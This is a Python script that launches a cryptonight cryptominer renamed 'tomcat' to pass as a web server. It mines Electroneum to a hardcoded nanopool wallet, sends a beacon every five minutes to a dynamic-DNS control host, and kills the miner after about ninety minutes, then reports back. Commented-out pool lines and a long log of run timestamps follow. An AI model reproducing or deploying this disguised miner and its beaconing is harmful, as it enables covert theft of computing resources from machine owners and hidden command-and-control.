import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:06.325596
#2018-02-17 16:26:03.612181
#2018-02-17 18:12:05.412014
#2018-02-17 20:00:07.874735
#2018-02-17 21:48:06.616616
#2018-02-17 23:33:04.995186
#2018-02-18 01:22:06.658420
#2018-02-18 03:09:04.508914
#2018-02-18 04:58:06.320438
#2018-02-18 06:52:01.575638
#2018-02-18 08:41:04.242074
#2018-02-18 10:27:04.963561
#2018-02-18 12:12:06.059579
#2018-02-18 13:57:06.943241
#2018-02-18 15:48:06.294823
#2018-02-18 17:37:06.545188
#2018-02-18 19:25:02.687801
#2018-02-18 21:11:01.352948
#2018-02-18 22:58:03.306703
#2018-02-19 00:46:05.342506
#2018-02-19 02:33:05.603804
#2018-02-19 04:19:05.763819
#2018-02-19 06:04:03.920600
#2018-02-19 07:52:03.938388
#2018-02-19 09:42:04.143325
#2018-02-19 11:31:08.778256
#2018-02-19 13:18:04.207851
#2018-02-19 15:06:05.550258
#2018-02-19 16:55:08.007244
#2018-02-19 18:43:03.722039
#2018-02-19 20:31:01.645935
#2018-02-19 22:18:06.219486
#2018-02-20 00:02:07.670227
#2018-02-20 01:49:05.758001
#2018-02-20 03:38:03.624804
#2018-02-20 05:23:05.134530
#2018-02-20 07:07:01.347663
#2018-02-20 08:53:04.780355
#2018-02-20 10:37:05.486672
#2018-02-20 12:23:06.933368
#2018-02-20 14:10:09.415712
#2018-02-20 15:55:06.757079
#2018-02-20 17:42:09.320463
#2018-02-20 19:32:07.863588
#2018-02-20 21:19:01.628452
#2018-02-20 23:05:06.538348
#2018-02-21 00:49:06.704061
#2018-02-21 02:35:06.342254
#2018-02-21 04:23:04.705167
#2018-02-21 06:11:06.512115
#2018-02-21 07:56:06.825174
#2018-02-21 09:43:06.641261
#2018-02-21 11:33:06.211016
#2018-02-21 13:22:06.884717
#2018-02-21 15:09:12.705669
#2018-02-21 16:58:12.940722
#2018-02-21 18:48:06.704015
#2018-02-21 20:34:01.321462
#2018-02-21 22:19:04.858300
#2018-02-22 00:08:08.790040
#2018-02-22 01:56:03.996296
#2018-02-22 03:44:06.787203
#2018-02-22 05:31:04.882147
#2018-02-22 07:16:07.108267
#2018-02-22 09:03:02.197871
#2018-02-22 10:50:10.357083
#2018-02-22 12:36:06.917719
#2018-02-22 14:21:06.972992
#2018-02-22 16:10:01.500239
#2018-02-22 17:57:06.361089
#2018-02-22 19:47:07.555349
#2018-02-22 21:37:04.889069
#2018-02-22 23:26:06.473094
#2018-02-23 01:16:06.420714
#2018-02-23 03:04:01.991214
#2018-02-23 04:48:07.530478
#2018-02-23 06:30:09.276487
#2018-02-23 08:17:01.584241
#2018-02-23 10:33:03.764795
#2018-02-23 12:24:07.102561
#2018-02-23 14:13:06.837563
#2018-02-23 16:03:06.455892
#2018-02-23 17:48:02.240997
#2018-02-23 19:36:04.274311
#2018-02-23 21:20:05.119751
#2018-02-23 23:08:06.078094
#2018-02-24 00:57:01.672300
#2018-02-24 02:51:07.767779
#2018-02-24 04:41:07.965631
#2018-02-24 06:25:07.924519
#2018-02-24 08:13:04.996739
#2018-02-24 09:57:03.596850
#2018-02-24 11:56:05.488939
#2018-02-24 13:45:04.219818
#2018-02-24 15:43:05.835703
#2018-02-24 17:36:01.911682
#2018-02-24 19:22:02.152418
#2018-02-24 21:12:06.639414
#2018-02-24 23:46:04.987764
#2018-02-25 03:07:01.772687
#2018-02-25 06:57:01.437509